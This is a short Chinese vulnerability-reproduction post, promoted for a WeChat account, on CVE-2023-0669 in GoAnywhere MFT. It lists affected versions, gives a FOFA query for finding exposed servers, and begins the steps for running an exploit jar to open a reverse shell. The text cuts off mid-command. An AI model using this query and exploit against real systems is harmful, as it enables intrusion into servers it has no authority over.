文章目录
漏洞复现 CVE-2023-0669 GoAnywhereMFT存在反序列化漏洞
1. GoAnywhere MFT 简介
微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发
HelpSystems GoAnywhere MFT是美国HelpSystems公司的一款托管文件传输软件。
2.漏洞描述
HelpSystems GoAnywhere MFT是美国HelpSystems公司的一款托管文件传输软件。 HelpSystems GoAnywhere MFT存在安全漏洞,该漏洞源于身份验证不正确,从而导致命令注入。
CVE-2023-0669
CNNVD-202302-398
3.影响版本
GoAnywhereMFT小于7.1.2版本
4.fofa 查询语句
fofa:“GoAnywhere”
5.漏洞复现
下载CVE-2023-0669.jar 使用命令反弹shell:
java -jar CVE-2023-0669.jar -p htt